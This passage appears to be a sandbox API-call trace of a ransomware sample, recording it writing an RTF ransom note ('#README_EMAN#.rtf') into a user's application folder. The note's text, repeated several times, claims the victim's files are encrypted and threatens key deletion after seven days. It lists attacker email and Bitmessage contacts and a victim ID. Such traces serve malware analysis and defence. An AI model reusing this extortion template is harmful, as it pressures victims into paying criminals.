\\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x236ff98, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fs\x07", lpUsedDefaultChar=0x0) returned 8717 [0295.546] WriteFile (in: hFile=0x2ec, lpBuffer=0x236ff98*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x236ff98*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0295.547] CloseHandle (hObject=0x2ec) returned 1 [0295.547] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick.2\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\qml\\qtquick.2\\#readme_eman#.rtf")) returned 0xffffffff [0295.547] GetLastError () returned 0x2 [0295.547] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick.2\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\qml\\qtquick.2\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0295.896] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.896] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 